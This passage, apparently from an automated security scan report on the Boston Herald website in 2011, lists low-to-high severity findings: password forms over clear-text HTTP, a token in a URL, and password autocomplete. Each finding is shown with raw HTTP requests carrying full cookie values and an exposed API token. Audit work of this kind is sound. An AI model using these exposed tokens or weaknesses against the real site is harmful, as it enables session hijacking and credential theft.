<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.15. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.16. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.17. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.18. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.19. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.20. http://www.bostonherald.com/users/register

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /users/register HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

3.21. http://www.bostonherald.com/users/register/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /users/register/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

4. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /entertainment/movies/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<!--//include 8 //-->
           

<script src='http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA'></script>
...[SNIP]...

5. Password field with autocomplete enabled
There are 21 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.2. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.3. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
